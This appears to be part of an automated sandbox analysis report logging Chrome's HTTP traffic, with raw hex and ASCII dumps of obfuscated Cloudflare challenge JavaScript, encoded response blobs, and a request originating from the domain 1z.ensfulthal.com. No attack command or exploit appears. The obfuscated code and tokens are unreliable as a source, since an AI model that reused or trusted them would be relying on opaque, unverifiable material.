                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 68 45 28 37 35 31 29 5d 29 7b 69 66 28 64 5b 68 45 28 31 35 38 31 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 68 45 28 31 35 38 36 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 68 45 28 31 38 35 34 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 68 45 28 35 37 38 29 5d 5b 68 45 28 31 36 32 33 29 5d 5b 68 45 28 31 30 36 33 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 68 45 28 35 37 38 29 5d 5b 68 45 28 31 36 32 33 29 5d 5b 68 45 28 31 30 36 33 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74
                                                                                          Data Ascii: hE(751)]){if(d[hE(1581)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[hE(1586)];J+=1)if(K=i[hE(1854)](J),Object[hE(578)][hE(1623)][hE(1063)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[hE(578)][hE(1623)][hE(1063)](x,L))C=L;else{if(Object
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 31 36 29 5d 28 48 2c 31 29 7c 4d 2c 49 3d 3d 64 5b 68 45 28 35 32 33 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 68 45 28 31 36 30 32 29 5d 28 64 5b 68 45 28 31 37 37 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 45 28 31 35 35 38 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 45 28 31 30 30 36 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 68 45 28 39 37 38 29 5d 28 48 2c 31 29 7c 4d 26 31 2e 38 33 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 45 28 31 36 30 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 68 45 28 31 33 33 37 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c
                                                                                          Data Ascii: 16)](H,1)|M,I==d[hE(523)](j,1)?(I=0,G[hE(1602)](d[hE(1775)](o,H)),H=0):I++,M=0,s++);for(M=C[hE(1558)](0),s=0;d[hE(1006)](16,s);H=d[hE(978)](H,1)|M&1.83,j-1==I?(I=0,G[hE(1602)](o(H)),H=0):I++,M>>=1,s++);}D--,D==0&&(D=Math[hE(1337)](2,F),F++),delete B[C]}el
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 77 69 74 63 68 28 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 48 28 31 33 33 37 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 4e 21 3d 49 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31 2c 64 5b 68 48 28 31 36 37 37 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 68 48 28 39 37 34 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 68 48 28 31 30 31 35 29 5d 28 30 3c 4f 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 50 3d 64 5b 68 48 28 31 32 34 37 29 5d 28 65 2c 4d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 48 28 31 33 33 37 29 5d 28 32 2c 31 36 29 2c 49 3d 31 3b 4e 21 3d 49 3b 4f 3d 64 5b 68 48 28 31 37 39 34 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 30 3d 3d 4b 26 26 28 4b 3d 6f 2c 4a 3d 73
                                                                                          Data Ascii: witch(M){case 0:for(M=0,N=Math[hH(1337)](2,8),I=1;N!=I;O=J&K,K>>=1,d[hH(1677)](0,K)&&(K=o,J=d[hH(974)](s,L++)),M|=d[hH(1015)](0<O?1:0,I),I<<=1);P=d[hH(1247)](e,M);break;case 1:for(M=0,N=Math[hH(1337)](2,16),I=1;N!=I;O=d[hH(1794)](J,K),K>>=1,0==K&&(K=o,J=s
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 29 2c 64 5b 68 49 28 37 32 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 68 49 28 38 36 35 29 5d 5b 68 49 28 37 39 30 29 5d 28 65 5b 68 49 28 37 32 39 29 5d 28 32 2c 66 29 2c 33 32 29 2c 65 4d 5b 68 49 28 31 34 37 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 4e 2c 68 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 29 7b 69 66 28 68 4e 3d 68 49 2c 68 3d 7b 27 5a 67 7a 6d 61 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 68 4a 29 7b 72 65 74 75 72 6e 20 68 4a 3d 62 2c 65 5b 68 4a 28 31 36 30 36 29 5d 28 69 2c 6a 29 7d 2c 27 59 75 56 78 72 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 69 2b 6a 7d 2c 27 67 6d 4c 63 62 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c
                                                                                          Data Ascii: ),d[hI(729)]=function(h,i){return h<<i},e=d,f=1,g=1e3*eM[hI(865)][hI(790)](e[hI(729)](2,f),32),eM[hI(1477)](function(hN,h,j,k,l,m,n){if(hN=hI,h={'Zgzma':function(i,j,hJ){return hJ=b,e[hJ(1606)](i,j)},'YuVxr':function(i,j){return i+j},'gmLcb':function(i,j,


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.1649736104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:14 UTC1173OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          Content-Length: 3018
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                          CF-Chl-RetryAttempt: 0
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          CF-Challenge: oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Origin: https://challenges.cloudflare.com
                                                                                          Sec-Fetch-Site: same-origin
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:14 UTC3018OUTData Raw: 76 5f 38 65 39 32 62 61 39 34 36 64 64 65 38 63 65 63 3d 47 71 2d 4f 44 4f 79 4f 47 4f 24 4f 41 6a 70 58 6a 70 7a 4f 6a 43 4f 53 55 2d 64 70 48 6a 66 49 70 45 6b 70 34 55 62 55 6a 43 79 70 66 4f 47 2d 6a 4e 69 2d 70 51 73 4b 55 41 64 72 42 36 70 39 4c 4f 70 30 43 70 79 55 34 67 70 59 78 72 61 70 78 59 55 34 42 70 57 55 70 49 70 4b 78 70 75 69 72 63 70 72 77 34 70 53 37 42 41 59 48 70 4c 51 33 2d 70 2d 51 52 30 68 6b 70 73 51 24 70 63 2d 30 48 49 66 4a 61 6a 6e 4e 48 67 6c 4b 70 6e 2d 70 24 6e 4c 6b 56 70 4f 52 30 4f 64 70 36 63 48 37 62 65 45 41 50 58 64 64 53 34 4b 62 70 41 4c 30 30 70 70 7a 79 2d 70 50 70 72 48 6b 42 70 70 47 42 6a 57 70 36 7a 35 70 4f 72 4c 57 70 4c 5a 66 56 4c 33 70 25 32 62 58 69 66 49 70 70 56 70 52 35 70 4f 6a 75 70 2b 77 37 73 70
                                                                                          Data Ascii: v_8e92ba946dde8cec=Gq-ODOyOGO$OAjpXjpzOjCOSU-dpHjfIpEkp4UbUjCypfOG-jNi-pQsKUAdrB6p9LOp0CpyU4gpYxrapxYU4BpWUpIpKxpuircprw4pS7BAYHpLQ3-p-QR0hkpsQ$pc-0HIfJajnNHglKpn-p$nLkVpOR0Odp6cH7beEAPXddS4KbpAL00ppzy-pPprHkBppGBjWp6z5pOrLWpLZfVL3p%2bXifIppVpR5pOjup+w7sp
                                                                                          2024-11-27 14:15:15 UTC747INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:15 GMT
                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                          Content-Length: 149752
                                                                                          Connection: close
                                                                                          cf-chl-gen: qsuMV1jq7+6ibDmfD8kbwTowdHJ6wvVc/qVa1WS06ZKr+Qnh/Fh9BtG04QTESIblotneBTkQrz8oVN5doZz3zXJtFqeJmOdccnJITLXbifFLWJh0mcyc+lSreTauMuwzdHkSCoh9AUE+oGIg/elsDCPoqtLA8q+4WU+zFebAdfp9Q2l3aWmJsa6/Z+3LRsvdp6Q+eAUGZx1jsY0kf79ZxPS0TrJ7vGoACIjCzgM9T/4DMEXuJJHNF7IRVbETcaPohb5CKJfsmQxTsAguYgNigiS8dv1JscsRlQehx7HTN5SJg5blQGGsYB8PE6noPx6b2k2lNT62T4P8/RU5QtZY2e3qDxyaiwpSmOQdNKB0H2RvRChFdtwuYZmztNxwty3LRu+LhOI7JAaheueMDfPzWda1/dB8t6BlaaEf5kQIvPG09WlH+8yIMSEEsN+GmEKa/qgSS/DHHBE+8pJ8KXau5XH8qVeoPNj8xmGL5XyneOGR3vc=$hf7B0/4CQ5R8VlSt
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92baae6d468c36-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:15 UTC622INData Raw: 65 31 31 67 5a 32 5a 6d 6a 30 2b 47 65 6d 32 4a 69 70 52 70 58 48 4f 68 6c 6e 74 7a 62 32 65 65 67 33 36 6f 72 61 71 63 70 6e 35 77 6e 36 71 6a 66 36 32 42 72 36 69 37 69 48 53 4c 76 71 32 75 6d 5a 53 65 72 62 69 64 74 59 65 49 75 5a 2b 6a 71 61 32 5a 70 4b 6d 65 6a 39 57 6b 6a 62 53 31 30 39 57 75 6c 5a 58 61 71 38 79 61 33 70 37 44 35 71 65 37 33 71 72 6c 36 63 33 76 30 4e 79 76 37 2b 72 67 73 2f 54 4c 30 74 6a 35 75 4f 7a 33 37 39 61 36 2b 63 72 37 39 4f 48 34 78 4d 48 31 36 50 54 48 41 64 72 59 42 42 50 37 7a 4e 48 67 41 4e 41 59 30 52 4c 6a 38 77 6e 59 36 68 6e 37 47 66 6b 65 48 74 38 6b 48 52 34 47 2f 67 72 74 35 2b 45 41 44 7a 49 74 37 65 63 31 39 67 50 35 4c 69 55 78 2b 44 6b 33 48 53 30 53 48 6b 4d 79 4f 69 58 36 41 77 56 4a 47 68 6b 6f 4a 45 45
                                                                                          Data Ascii: e11gZ2Zmj0+Gem2JipRpXHOhlntzb2eeg36oraqcpn5wn6qjf62Br6i7iHSLvq2umZSerbidtYeIuZ+jqa2ZpKmej9WkjbS109WulZXaq8ya3p7D5qe73qrl6c3v0Nyv7+rgs/TL0tj5uOz379a6+cr79OH4xMH16PTHAdrYBBP7zNHgANAY0RLj8wnY6hn7GfkeHt8kHR4G/grt5+EADzIt7ec19gP5LiUx+Dk3HS0SHkMyOiX6AwVJGhkoJEE
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 59 37 48 6a 59 71 51 56 6c 72 4b 32 42 6d 51 6b 6f 2b 4a 6a 31 46 64 7a 4d 76 4f 55 64 46 61 55 30 32 4f 46 41 35 59 6b 4a 54 51 6c 78 6f 51 6c 31 36 52 6f 57 43 65 57 31 4e 54 6f 57 41 59 6d 70 2f 57 49 61 4b 6d 6c 64 55 6d 35 6c 2f 63 56 35 79 6d 58 32 57 58 61 57 59 6b 6f 4b 46 6d 5a 70 6d 72 35 4b 48 6f 5a 46 79 68 57 2b 47 70 4b 4b 45 6d 4a 4b 4d 76 4c 42 36 6b 4a 57 4f 77 37 65 79 71 62 79 42 76 49 54 44 74 73 53 66 77 4d 50 49 31 61 50 42 6c 62 58 50 6d 62 79 71 74 4b 2f 67 77 4b 43 77 6f 64 37 51 32 37 36 6b 76 75 48 58 6e 73 72 69 37 64 36 75 35 72 32 2f 72 64 2f 44 73 39 72 31 38 39 47 32 2f 75 6e 4f 33 2b 41 45 32 38 44 55 34 2f 4c 6a 79 50 50 49 79 76 6b 4b 34 75 38 50 42 4f 66 4f 46 77 72 77 2b 66 6a 74 2b 52 33 74 33 67 33 38 33 69 44 78 2f
                                                                                          Data Ascii: Y7HjYqQVlrK2BmQko+Jj1FdzMvOUdFaU02OFA5YkJTQlxoQl16RoWCeW1NToWAYmp/WIaKmldUm5l/cV5ymX2WXaWYkoKFmZpmr5KHoZFyhW+GpKKEmJKMvLB6kJWOw7eyqbyBvITDtsSfwMPI1aPBlbXPmbyqtK/gwKCwod7Q276kvuHXnsri7d6u5r2/rd/Ds9r189G2/unO3+AE28DU4/LjyPPIyvkK4u8PBOfOFwrw+fjt+R3t3g383iDx/
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 45 4c 47 46 43 5a 6d 42 65 58 53 31 79 52 32 39 50 59 6e 64 73 63 47 68 65 4e 6c 42 30 51 54 74 34 52 58 46 49 58 6c 68 6f 65 48 74 37 57 47 74 68 68 32 6d 4a 67 33 57 52 61 6d 70 55 65 46 5a 74 61 6f 75 4b 58 70 74 65 6a 32 36 6c 59 5a 47 6e 6d 61 56 34 66 49 36 4b 65 47 36 63 65 34 39 2f 64 6f 36 7a 65 5a 68 79 6a 6f 6d 73 75 4b 6a 41 6d 37 6d 64 6b 72 32 57 6c 34 53 66 6e 73 6d 67 79 4b 37 44 77 70 36 52 6b 5a 32 33 7a 4b 6e 45 6c 39 54 52 31 37 2f 55 74 39 47 32 30 4c 50 63 34 71 66 70 76 70 7a 4b 78 62 69 74 70 74 37 6c 33 72 2f 55 31 66 54 55 72 74 48 4b 72 64 6a 32 76 65 33 2b 73 37 72 67 34 4e 4c 51 30 39 50 46 43 77 48 38 43 65 48 73 79 63 37 4b 34 4e 30 45 41 4e 50 7a 30 4e 49 47 38 78 34 4e 33 66 51 54 41 78 72 77 46 75 58 68 2b 76 50 6c 35 2f
                                                                                          Data Ascii: ELGFCZmBeXS1yR29PYndscGheNlB0QTt4RXFIXlhoeHt7WGthh2mJg3WRampUeFZtaouKXptej26lYZGnmaV4fI6KeG6ce49/do6zeZhyjomsuKjAm7mdkr2Wl4SfnsmgyK7Dwp6RkZ23zKnEl9TR17/Ut9G20LPc4qfpvpzKxbitpt7l3r/U1fTUrtHKrdj2ve3+s7rg4NLQ09PFCwH8CeHsyc7K4N0EANPz0NIG8x4N3fQTAxrwFuXh+vPl5/
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 5a 57 6c 4b 62 44 56 4f 4d 32 52 6e 62 33 68 54 58 31 4d 34 55 58 4a 7a 52 6e 78 6a 65 33 56 72 5a 32 35 6f 62 30 68 6b 6b 33 4a 66 54 6f 52 72 56 32 71 44 6e 4a 4b 62 69 6f 31 7a 62 57 47 67 67 61 61 44 71 4b 4f 56 69 59 71 68 61 6d 68 36 6f 71 68 71 69 59 36 73 6f 33 47 35 73 36 69 61 68 6e 69 36 6d 72 65 73 76 49 78 38 65 36 2b 6d 79 62 65 56 6e 63 43 71 75 4c 2b 2b 70 72 4c 55 78 35 2b 49 78 71 36 30 6c 37 4f 78 32 4c 58 52 72 72 57 37 73 62 7a 44 35 61 44 56 76 37 33 42 6f 71 4f 35 79 61 6a 4a 36 65 6e 63 30 36 2f 32 38 65 36 73 77 2b 54 59 75 65 76 59 38 4e 37 56 33 66 44 6a 41 4f 6a 34 35 77 7a 48 78 41 67 4c 42 68 4d 42 33 2f 44 6d 38 68 6b 4a 41 78 55 4e 36 68 37 30 49 66 34 42 41 2f 7a 35 44 79 44 69 39 41 4c 6d 41 53 77 59 4a 77 59 66 44 65 37
                                                                                          Data Ascii: ZWlKbDVOM2Rnb3hTX1M4UXJzRnxje3VrZ25ob0hkk3JfToRrV2qDnJKbio1zbWGggaaDqKOViYqhamh6oqhqiY6so3G5s6iahni6mresvIx8e6+mybeVncCquL++prLUx5+Ixq60l7Ox2LXRrrW7sbzD5aDVv73BoqO5yajJ6enc06/28e6sw+TYuevY8N7V3fDjAOj45wzHxAgLBhMB3/Dm8hkJAxUN6h70If4BA/z5DyDi9ALmASwYJwYfDe7
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 44 6c 31 50 56 46 34 56 6e 35 42 50 56 56 65 52 57 46 32 66 6b 61 49 64 48 32 45 53 6d 68 2b 6b 70 42 4c 67 33 4a 4f 65 49 47 54 65 46 71 65 6e 31 74 30 65 32 2b 61 66 34 5a 35 67 58 36 45 69 32 4b 68 68 33 2b 65 71 49 75 54 6f 36 32 69 69 47 36 57 6c 70 71 55 6e 4b 71 4a 65 35 65 64 6b 37 75 79 66 70 36 46 6d 71 43 57 6e 72 7a 4c 70 4a 2b 68 6f 61 62 49 30 5a 58 4b 6c 74 61 76 74 5a 4c 4b 6c 74 57 59 77 4b 37 52 76 62 75 77 32 4f 47 2b 79 4c 71 72 77 75 76 4a 71 74 33 6e 30 2b 2f 42 35 4c 48 33 79 50 71 34 32 4e 66 55 38 37 58 54 38 74 4b 31 33 63 38 44 35 4e 73 42 38 2b 41 4c 44 63 63 46 35 38 6a 76 41 52 55 52 38 67 37 4b 44 67 51 47 32 42 6a 30 48 67 49 58 41 77 44 78 38 69 66 76 2b 53 48 63 36 65 67 72 41 79 30 6a 4d 43 77 55 42 4f 77 4d 43 79 4c 77
                                                                                          Data Ascii: Dl1PVF4Vn5BPVVeRWF2fkaIdH2ESmh+kpBLg3JOeIGTeFqen1t0e2+af4Z5gX6Ei2Khh3+eqIuTo62iiG6WlpqUnKqJe5edk7uyfp6FmqCWnrzLpJ+hoabI0ZXKltavtZLKltWYwK7Rvbuw2OG+yLqrwuvJqt3n0+/B5LH3yPq42NfU87XT8tK13c8D5NsB8+ALDccF58jvARUR8g7KDgQG2Bj0HgIXAwDx8ifv+SHc6egrAy0jMCwUBOwMCyLw
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 74 39 53 32 39 34 52 6e 52 7a 52 55 46 36 67 34 56 66 61 57 56 65 62 6c 31 4b 54 33 5a 7a 6c 47 52 72 61 57 39 36 57 6c 71 4f 67 49 70 2f 6a 70 70 63 64 4a 4a 6b 6c 71 65 4e 70 47 52 36 73 47 6d 46 6f 36 36 64 6a 35 57 51 70 48 43 72 73 6e 6d 78 73 71 2f 42 6f 70 57 66 72 36 57 63 70 5a 57 58 70 72 75 4c 70 34 71 65 6f 4d 57 4c 71 4d 61 66 74 35 4f 7a 79 63 50 46 31 70 62 65 32 4b 44 62 31 39 72 53 74 4d 69 34 76 38 69 6c 34 71 57 33 32 64 6e 6c 72 74 2b 79 36 4f 7a 31 7a 38 7a 56 75 76 48 30 76 4e 33 75 41 74 7a 75 2f 64 72 53 31 4e 37 32 35 2b 72 6c 2f 75 76 50 79 66 33 68 35 42 44 39 43 39 49 4d 36 52 59 54 32 64 30 63 43 76 41 68 34 75 37 35 33 4f 2f 33 41 77 59 69 42 67 37 37 43 41 34 4e 2f 67 51 6b 4a 42 55 41 4d 4f 38 51 37 43 54 7a 46 6a 73 54 50
                                                                                          Data Ascii: t9S294RnRzRUF6g4VfaWVebl1KT3ZzlGRraW96WlqOgIp/jppcdJJklqeNpGR6sGmFo66dj5WQpHCrsnmxsq/BopWfr6WcpZWXpruLp4qeoMWLqMaft5OzycPF1pbe2KDb19rStMi4v8il4qW32dnlrt+y6Oz1z8zVuvH0vN3uAtzu/drS1N725+rl/uvPyf3h5BD9C9IM6RYT2d0cCvAh4u753O/3AwYiBg77CA4N/gQkJBUAMO8Q7CTzFjsTP
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 53 53 55 42 30 64 6d 79 41 67 32 52 39 6b 57 4b 52 56 46 4b 4c 57 48 64 6c 62 59 57 49 63 6c 65 53 6b 34 4a 32 6f 58 65 6b 5a 49 6d 67 5a 49 5a 6e 72 6f 6c 37 69 6f 32 48 6a 5a 53 55 6f 59 32 53 69 34 31 7a 65 4b 6d 4f 72 48 75 73 64 4d 4f 2f 77 49 2b 56 6e 62 6d 35 70 36 61 34 7a 38 6d 69 70 34 2b 51 30 71 66 48 79 5a 4c 57 30 37 6d 4f 33 4b 69 5a 74 4c 69 36 74 65 53 63 32 4f 48 48 79 63 66 61 31 65 75 32 37 63 4c 70 34 65 33 66 36 72 48 4a 78 50 66 6f 31 4d 7a 72 75 75 6e 33 75 66 58 74 42 4f 58 36 34 74 54 78 77 4e 54 2b 39 2b 45 50 36 64 48 6a 79 76 4d 4a 43 2f 4c 68 36 64 50 73 2b 66 6b 59 41 42 76 54 38 76 41 4f 38 68 62 64 48 65 54 70 48 52 62 6e 4b 6a 45 43 4d 65 30 6e 42 50 33 31 4b 52 55 62 48 44 41 59 4a 7a 59 4b 46 6a 49 6b 4d 78 51 43 51 69
                                                                                          Data Ascii: SSUB0dmyAg2R9kWKRVFKLWHdlbYWIcleSk4J2oXekZImgZIZnrol7io2HjZSUoY2Si41zeKmOrHusdMO/wI+Vnbm5p6a4z8mip4+Q0qfHyZLW07mO3KiZtLi6teSc2OHHycfa1eu27cLp4e3f6rHJxPfo1Mzruun3ufXtBOX64tTxwNT+9+EP6dHjyvMJC/Lh6dPs+fkYABvT8vAO8hbdHeTpHRbnKjECMe0nBP31KRUbHDAYJzYKFjIkMxQCQi
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 54 47 46 6d 61 6d 56 6b 6c 57 35 6b 68 6f 36 4e 56 58 4b 55 63 46 65 54 6d 61 4e 32 67 6c 79 51 71 4b 57 6b 6f 36 6d 41 71 70 32 65 69 6f 2b 45 6e 36 57 69 68 62 61 42 64 6f 69 54 73 6e 71 51 6d 37 69 52 64 4c 62 44 6f 4d 44 43 6d 4c 54 4a 77 6f 6a 4f 71 59 47 6d 6d 35 44 52 31 61 72 50 31 4a 53 69 78 62 43 78 75 74 71 31 6e 36 48 51 79 35 36 65 32 65 62 55 34 39 4b 6a 32 63 76 69 76 73 66 53 37 74 44 7a 79 74 50 49 31 39 65 79 31 4b 37 55 79 64 61 32 2b 67 50 5a 41 4d 33 44 39 2f 37 61 38 2b 7a 43 2b 2f 66 4c 78 67 38 49 79 74 48 31 45 42 4d 55 32 4e 44 6b 44 66 54 39 44 4f 2f 32 46 69 45 55 33 69 63 6d 4a 2b 44 71 46 51 6f 47 34 42 73 6a 38 41 59 50 48 65 77 51 4f 52 59 74 39 77 55 5a 45 6a 6a 36 2b 7a 63 78 45 41 52 43 47 42 52 4b 46 6b 56 48 49 77 63
                                                                                          Data Ascii: TGFmamVklW5kho6NVXKUcFeTmaN2glyQqKWko6mAqp2eio+En6WihbaBdoiTsnqQm7iRdLbDoMDCmLTJwojOqYGmm5DR1arP1JSixbCxutq1n6HQy56e2ebU49Kj2cvivsfS7tDzytPI19ey1K7Uyda2+gPZAM3D9/7a8+zC+/fLxg8IytH1EBMU2NDkDfT9DO/2FiEU3icmJ+DqFQoG4Bsj8AYPHewQORYt9wUZEjj6+zcxEARCGBRKFkVHIwc
                                                                                          2024-11-27 14:15:15 UTC1369INData Raw: 45 68 54 55 32 61 62 57 48 52 79 57 48 46 53 6d 35 5a 79 6f 46 31 64 6f 70 64 6f 67 59 79 71 6d 32 69 5a 71 4c 47 43 6a 57 31 30 70 62 65 56 63 37 46 36 6d 5a 75 74 74 4c 4b 4e 65 71 43 44 78 48 79 76 6b 36 4b 4a 71 38 56 2f 78 36 7a 4e 6e 34 7a 43 72 62 43 69 78 71 7a 53 79 5a 48 52 6a 39 58 41 31 39 4f 59 78 4b 32 35 34 4c 79 35 77 73 58 59 37 65 48 74 7a 64 2f 52 78 62 32 74 72 39 58 4d 38 4c 6e 56 79 2b 53 30 37 62 7a 74 7a 66 33 35 35 66 76 43 33 4f 4b 2f 33 4f 67 41 33 77 76 75 38 4d 30 53 2b 38 6f 58 37 42 4d 4b 31 39 72 58 37 51 33 74 45 64 7a 36 48 66 6a 37 46 2f 76 6c 45 76 33 34 4b 67 44 32 45 50 6f 6c 43 42 49 6f 4e 67 6f 43 42 7a 62 33 4e 42 41 7a 4b 52 55 36 45 52 77 53 45 76 77 61 4e 43 6b 4a 53 79 72 39 4c 6b 45 48 4b 30 49 4f 56 43 4a 52
                                                                                          Data Ascii: EhTU2abWHRyWHFSm5ZyoF1dopdogYyqm2iZqLGCjW10pbeVc7F6mZuttLKNeqCDxHyvk6KJq8V/x6zNn4zCrbCixqzSyZHRj9XA19OYxK254Ly5wsXY7eHtzd/Rxb2tr9XM8LnVy+S07bztzf355fvC3OK/3OgA3wvu8M0S+8oX7BMK19rX7Q3tEdz6Hfj7F/vlEv34KgD2EPolCBIoNgoCBzb3NBAzKRU6ERwSEvwaNCkJSyr9LkEHK0IOVCJR


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.164973735.190.80.14435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:15 UTC534OUTOPTIONS /report/v4?s=4ce7RThVQZpN7IE5xxKOe0P8S%2FBBHoh8iRb%2BghZ9wXUZrUs1f07CKzSk9AHtrWHxCj07mt7nKxptNhr04iq5WrdviuwnSLHWCcLvAMVDpYf7txsPzStGcJ4kTUQ9Gw%3D%3D HTTP/1.1
                                                                                          Host: a.nel.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          Origin: https://1z.ensfulthal.com
                                                                                          Access-Control-Request-Method: POST
                                                                                          Access-Control-Request-Headers: content-type
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:16 UTC336INHTTP/1.1 200 OK
                                                                                          Content-Length: 0
                                                                                          access-control-max-age: 86400
                                                                                          access-control-allow-methods: OPTIONS, POST
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-headers: content-length, content-type
                                                                                          date: Wed, 27 Nov 2024 14:15:15 GMT
                                                                                          Via: 1.1 google
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.1649738104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:17 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: none
